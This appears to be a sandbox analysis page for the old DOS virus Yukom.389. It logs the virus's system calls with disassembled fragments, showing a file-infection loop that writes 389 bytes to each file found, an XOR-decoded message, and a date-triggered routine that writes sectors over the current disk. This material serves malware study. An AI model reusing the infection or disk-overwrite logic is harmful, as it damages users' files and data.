Sample viewer

vx.netlux.org/Virus.DOS.Yukom.389

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:03.937410403Z 26 PC: 12a5d | Set disk transfer address
2018-12-17T22:57:03.939526847Z 53 PC: 12a63 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:57:03.940442527Z 53 PC: 12a70 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:57:03.941869902Z 44 PC: 12a7b | Get time 0x12a7b: cmp dl, 0xd
0x12a7e: jg 0x12a84
0x12a80: mov al, 0x82
0x12a82: out 0x21, al
0x12a84: mov ah, 0x2c
0x12a86: int 0x21
0x12a88: cmp dl, 0x32
0x12a8b: jg 0x12ae7
0x12a8d: mov si, 0
0x12a90: xor byte ptr [bp + si + 0x16c], 0x41
0x12a95: cmp si, 0x11
0x12a98: je 0x12a9d
0x12a9a: inc si
0x12a9b: jmp 0x12a90
0x12a9d: mov ah, 9
0x12a9f: lea dx, word ptr [bp + 0x16c]
0x12aa3: int 0x21
0x12aa5: mov ah, 0
0x12aa7: int 0x16
0x12aa9: jmp 0x12ae7
2018-12-17T22:57:03.943594595Z 44 PC: 12a88 | Get time 0x12a88: cmp dl, 0x32
0x12a8b: jg 0x12ae7
0x12a8d: mov si, 0
0x12a90: xor byte ptr [bp + si + 0x16c], 0x41
0x12a95: cmp si, 0x11
0x12a98: je 0x12a9d
0x12a9a: inc si
0x12a9b: jmp 0x12a90
0x12a9d: mov ah, 9
0x12a9f: lea dx, word ptr [bp + 0x16c]
0x12aa3: int 0x21
0x12aa5: mov ah, 0
0x12aa7: int 0x16
0x12aa9: jmp 0x12ae7
0x12aab: nop
0x12aac: and byte ptr [di + 0x79], cl
0x12aaf: and byte ptr [bp + 0x61], cl
0x12ab2: insw word ptr es:[di], dx
0x12ab3: and byte ptr gs:[bx + di + 0x73], ch
0x12ab7: and byte ptr [bx + di + 0x75], bl
2018-12-17T22:57:03.945655521Z 78 PC: 12b00 | Find first file
2018-12-17T22:57:03.951508197Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:03.958088146Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:03.964749251Z 66 PC: 12b2d | Move file pointer
2018-12-17T22:57:03.966508052Z 64 PC: 12b3f | Write file or device (Write 389 bytes on handle 5)
2018-12-17T22:57:04.238475245Z 66 PC: 12b47 | Move file pointer
2018-12-17T22:57:04.240670631Z 64 PC: 12b52 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:04.24711824Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.255016773Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.258567324Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.264865033Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.271514512Z 66 PC: 12b2d | Move file pointer
2018-12-17T22:57:04.274222284Z 64 PC: 12b3f | Write file or device (Write 389 bytes on handle 5)
2018-12-17T22:57:04.276855273Z 66 PC: 12b47 | Move file pointer
2018-12-17T22:57:04.278169637Z 64 PC: 12b52 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:04.281832181Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.289590268Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.292043736Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.298477123Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.305182701Z 66 PC: 12b2d | Move file pointer
2018-12-17T22:57:04.306551055Z 64 PC: 12b3f | Write file or device (Write 389 bytes on handle 5)
2018-12-17T22:57:04.309173839Z 66 PC: 12b47 | Move file pointer
2018-12-17T22:57:04.310976714Z 64 PC: 12b52 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:04.313791309Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.321524106Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.328143587Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.334526169Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.341272852Z 66 PC: 12b2d | Move file pointer
2018-12-17T22:57:04.343060521Z 64 PC: 12b3f | Write file or device (Write 389 bytes on handle 5)
2018-12-17T22:57:04.345922611Z 66 PC: 12b47 | Move file pointer
2018-12-17T22:57:04.347595183Z 64 PC: 12b52 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:04.350713279Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.358421296Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.361225432Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.368384904Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.374776134Z 66 PC: 12b2d | Move file pointer
2018-12-17T22:57:04.376223341Z 64 PC: 12b3f | Write file or device (Write 389 bytes on handle 5)
2018-12-17T22:57:04.37992826Z 66 PC: 12b47 | Move file pointer
2018-12-17T22:57:04.381251209Z 64 PC: 12b52 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:04.3836895Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.3916532Z 42 PC: 12b70 | Get date 0x12b70: cmp dh, 0x11
0x12b73: jl 0x12b94
0x12b75: cmp dl, 8
0x12b78: jl 0x12b94
0x12b7a: mov ah, 0x19
0x12b7c: int 0x21
0x12b7e: mov cx, 0x25
0x12b81: mov dx, 0
0x12b84: lea bx, word ptr [bp + 0x16c]
0x12b88: push ds
0x12b89: pop es
0x12b8a: mov byte ptr [bp + 0x250], 0x26
0x12b8f: int 0x19
0x12b91: add sp, 2
0x12b94: mov ah, 0x1a
0x12b96: mov dx, 0x80
0x12b99: int 0x21
0x12b9b: mov al, 0xb7
0x12b9d: out 0x43, al
0x12b9f: mov ax, 0xb6
2018-12-17T22:57:04.393809505Z 26 PC: 12b9b | Set disk transfer address
2018-12-17T22:57:04.395072034Z 26 PC: 12a5d | Set disk transfer address
2018-12-17T22:57:04.396600851Z 53 PC: 12a63 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:57:04.397713043Z 53 PC: 12a70 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:57:04.398753247Z 44 PC: 12a7b | Get time 0x12a7b: cmp dl, 0xd
0x12a7e: jg 0x12a84
0x12a80: mov al, 0x82
0x12a82: out 0x21, al
0x12a84: mov ah, 0x2c
0x12a86: int 0x21
0x12a88: cmp dl, 0x32
0x12a8b: jg 0x12ae7
0x12a8d: mov si, 0
0x12a90: xor byte ptr [bp + si + 0x16c], 0x41
0x12a95: cmp si, 0x11
0x12a98: je 0x12a9d
0x12a9a: inc si
0x12a9b: jmp 0x12a90
0x12a9d: mov ah, 9
0x12a9f: lea dx, word ptr [bp + 0x16c]
0x12aa3: int 0x21
0x12aa5: mov ah, 0
0x12aa7: int 0x16
0x12aa9: jmp 0x12ae7
2018-12-17T22:57:04.401531585Z 44 PC: 12a88 | Get time 0x12a88: cmp dl, 0x32
0x12a8b: jg 0x12ae7
0x12a8d: mov si, 0
0x12a90: xor byte ptr [bp + si + 0x16c], 0x41
0x12a95: cmp si, 0x11
0x12a98: je 0x12a9d
0x12a9a: inc si
0x12a9b: jmp 0x12a90
0x12a9d: mov ah, 9
0x12a9f: lea dx, word ptr [bp + 0x16c]
0x12aa3: int 0x21
0x12aa5: mov ah, 0
0x12aa7: int 0x16
0x12aa9: jmp 0x12ae7
0x12aab: nop
0x12aac: and byte ptr [di + 0x79], cl
0x12aaf: and byte ptr [bp + 0x61], cl
0x12ab2: insw word ptr es:[di], dx
0x12ab3: and byte ptr gs:[bx + di + 0x73], ch
0x12ab7: and byte ptr [bx + di + 0x75], bl
2018-12-17T22:57:04.403771565Z 78 PC: 12b00 | Find first file
2018-12-17T22:57:04.41055179Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.418181091Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.420790001Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.42248469Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.425460994Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.432247516Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.435562363Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.437932088Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.440843017Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.447543893Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.458255282Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.460158407Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.462661334Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.469461874Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.472239575Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.474421891Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.47813327Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.484545846Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.487726625Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.489884021Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.492534626Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.4992233Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.506783914Z 66 PC: 12b2d | Move file pointer
2018-12-17T22:57:04.508432021Z 64 PC: 12b3f | Write file or device (Write 389 bytes on handle 5)
2018-12-17T22:57:04.614844775Z 66 PC: 12b47 | Move file pointer
2018-12-17T22:57:04.617900867Z 64 PC: 12b52 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:04.626841926Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.736408296Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.739413465Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.747078879Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.753875066Z 66 PC: 12b2d | Move file pointer
2018-12-17T22:57:04.755437179Z 64 PC: 12b3f | Write file or device (Write 389 bytes on handle 5)
2018-12-17T22:57:04.758609211Z 66 PC: 12b47 | Move file pointer
2018-12-17T22:57:04.759915814Z 64 PC: 12b52 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:04.762370805Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.92444837Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.927108792Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.933313465Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.93606346Z 66 PC: 12b2d | Move file pointer
2018-12-17T22:57:04.937455372Z 64 PC: 12b3f | Write file or device (Write 389 bytes on handle 5)
2018-12-17T22:57:04.946857691Z 66 PC: 12b47 | Move file pointer
2018-12-17T22:57:04.948637676Z 64 PC: 12b52 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:04.954791808Z 62 PC: 12b5b | Close file
2018-12-17T22:57:04.966104807Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:04.969345227Z 59 PC: 12b68 | Change current directory
2018-12-17T22:57:04.97331909Z 42 PC: 12b70 | Get date 0x12b70: cmp dh, 0x11
0x12b73: jl 0x12b94
0x12b75: cmp dl, 8
0x12b78: jl 0x12b94
0x12b7a: mov ah, 0x19
0x12b7c: int 0x21
0x12b7e: mov cx, 0x25
0x12b81: mov dx, 0
0x12b84: lea bx, word ptr [bp + 0x16c]
0x12b88: push ds
0x12b89: pop es
0x12b8a: mov byte ptr [bp + 0x250], 0x26
0x12b8f: int 0x19
0x12b91: add sp, 2
0x12b94: mov ah, 0x1a
0x12b96: mov dx, 0x80
0x12b99: int 0x21
0x12b9b: mov al, 0xb7
0x12b9d: out 0x43, al
0x12b9f: mov ax, 0xb6
2018-12-17T22:57:04.975335485Z 26 PC: 12b9b | Set disk transfer address
2018-12-17T22:57:04.976877082Z 26 PC: 12a5d | Set disk transfer address
2018-12-17T22:57:04.977920511Z 53 PC: 12a63 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:57:04.979037142Z 53 PC: 12a70 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:57:04.980556535Z 44 PC: 12a7b | Get time 0x12a7b: cmp dl, 0xd
0x12a7e: jg 0x12a84
0x12a80: mov al, 0x82
0x12a82: out 0x21, al
0x12a84: mov ah, 0x2c
0x12a86: int 0x21
0x12a88: cmp dl, 0x32
0x12a8b: jg 0x12ae7
0x12a8d: mov si, 0
0x12a90: xor byte ptr [bp + si + 0x16c], 0x41
0x12a95: cmp si, 0x11
0x12a98: je 0x12a9d
0x12a9a: inc si
0x12a9b: jmp 0x12a90
0x12a9d: mov ah, 9
0x12a9f: lea dx, word ptr [bp + 0x16c]
0x12aa3: int 0x21
0x12aa5: mov ah, 0
0x12aa7: int 0x16
0x12aa9: jmp 0x12ae7
2018-12-17T22:57:04.98246241Z 44 PC: 12a88 | Get time 0x12a88: cmp dl, 0x32
0x12a8b: jg 0x12ae7
0x12a8d: mov si, 0
0x12a90: xor byte ptr [bp + si + 0x16c], 0x41
0x12a95: cmp si, 0x11
0x12a98: je 0x12a9d
0x12a9a: inc si
0x12a9b: jmp 0x12a90
0x12a9d: mov ah, 9
0x12a9f: lea dx, word ptr [bp + 0x16c]
0x12aa3: int 0x21
0x12aa5: mov ah, 0
0x12aa7: int 0x16
0x12aa9: jmp 0x12ae7
0x12aab: nop
0x12aac: and byte ptr [di + 0x79], cl
0x12aaf: and byte ptr [bp + 0x61], cl
0x12ab2: insw word ptr es:[di], dx
0x12ab3: and byte ptr gs:[bx + di + 0x73], ch
0x12ab7: and byte ptr [bx + di + 0x75], bl
2018-12-17T22:57:04.984898548Z 78 PC: 12b00 | Find first file
2018-12-17T22:57:04.991058865Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:04.997117625Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:04.999398522Z 62 PC: 12b5b | Close file
2018-12-17T22:57:05.001387465Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:05.003774261Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:05.010007357Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:05.012837811Z 62 PC: 12b5b | Close file
2018-12-17T22:57:05.014358556Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:05.016723843Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:05.02316732Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:05.025471878Z 62 PC: 12b5b | Close file
2018-12-17T22:57:05.027012371Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:05.029915379Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:05.035991499Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:05.038304061Z 62 PC: 12b5b | Close file
2018-12-17T22:57:05.045899946Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:05.048417653Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:05.055702141Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:05.05895789Z 62 PC: 12b5b | Close file
2018-12-17T22:57:05.060676868Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:05.063524573Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:05.07038093Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:05.072932929Z 62 PC: 12b5b | Close file
2018-12-17T22:57:05.074650411Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:05.077780743Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:05.084078334Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:05.086639683Z 62 PC: 12b5b | Close file
2018-12-17T22:57:05.08887576Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:05.091390805Z 61 PC: 12b10 | Open file (Filename = '')
2018-12-17T22:57:05.097491511Z 63 PC: 12b1e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:05.10420078Z 62 PC: 12b5b | Close file
2018-12-17T22:57:05.105944788Z 79 PC: 12b00 | Find next file
2018-12-17T22:57:05.108298644Z 59 PC: 12b68 | Change current directory
2018-12-17T22:57:05.112724852Z 42 PC: 12b70 | Get date 0x12b70: cmp dh, 0x11
0x12b73: jl 0x12b94
0x12b75: cmp dl, 8
0x12b78: jl 0x12b94
0x12b7a: mov ah, 0x19
0x12b7c: int 0x21
0x12b7e: mov cx, 0x25
0x12b81: mov dx, 0
0x12b84: lea bx, word ptr [bp + 0x16c]
0x12b88: push ds
0x12b89: pop es
0x12b8a: mov byte ptr [bp + 0x250], 0x26
0x12b8f: int 0x19
0x12b91: add sp, 2
0x12b94: mov ah, 0x1a
0x12b96: mov dx, 0x80
0x12b99: int 0x21
0x12b9b: mov al, 0xb7
0x12b9d: out 0x43, al
0x12b9f: mov ax, 0xb6
2018-12-17T22:57:05.114674157Z 26 PC: 12b9b | Set disk transfer address
2018-12-17T22:57:05.115859662Z 26 PC: 12a5d | Set disk transfer address
2018-12-17T22:57:05.117597289Z 53 PC: 12a63 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:57:05.118774867Z 53 PC: 12a70 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:57:05.120036544Z 44 PC: 12a7b | Get time 0x12a7b: cmp dl, 0xd
0x12a7e: jg 0x12a84
0x12a80: mov al, 0x82
0x12a82: out 0x21, al
0x12a84: mov ah, 0x2c
0x12a86: int 0x21
0x12a88: cmp dl, 0x32
0x12a8b: jg 0x12ae7
0x12a8d: mov si, 0
0x12a90: xor byte ptr [bp + si + 0x16c], 0x41
0x12a95: cmp si, 0x11
0x12a98: je 0x12a9d
0x12a9a: inc si
0x12a9b: jmp 0x12a90
0x12a9d: mov ah, 9
0x12a9f: lea dx, word ptr [bp + 0x16c]
0x12aa3: int 0x21
0x12aa5: mov ah, 0
0x12aa7: int 0x16
0x12aa9: jmp 0x12ae7
2018-12-17T22:57:05.122286652Z 44 PC: 12a88 | Get time 0x12a88: cmp dl, 0x32
0x12a8b: jg 0x12ae7
0x12a8d: mov si, 0
0x12a90: xor byte ptr [bp + si + 0x16c], 0x41
0x12a95: cmp si, 0x11
0x12a98: je 0x12a9d
0x12a9a: inc si
0x12a9b: jmp 0x12a90
0x12a9d: mov ah, 9
0x12a9f: lea dx, word ptr [bp + 0x16c]
0x12aa3: int 0x21
0x12aa5: mov ah, 0
0x12aa7: int 0x16
0x12aa9: jmp 0x12ae7
0x12aab: nop
0x12aac: and byte ptr [di + 0x79], cl
0x12aaf: and byte ptr [bp + 0x61], cl
0x12ab2: insw word ptr es:[di], dx
0x12ab3: and byte ptr gs:[bx + di + 0x73], ch
0x12ab7: and byte ptr [bx + di + 0x75], bl
2018-12-17T22:57:05.124092718Z 9 PC: 12aa5 | Display string (Could not find end pointer)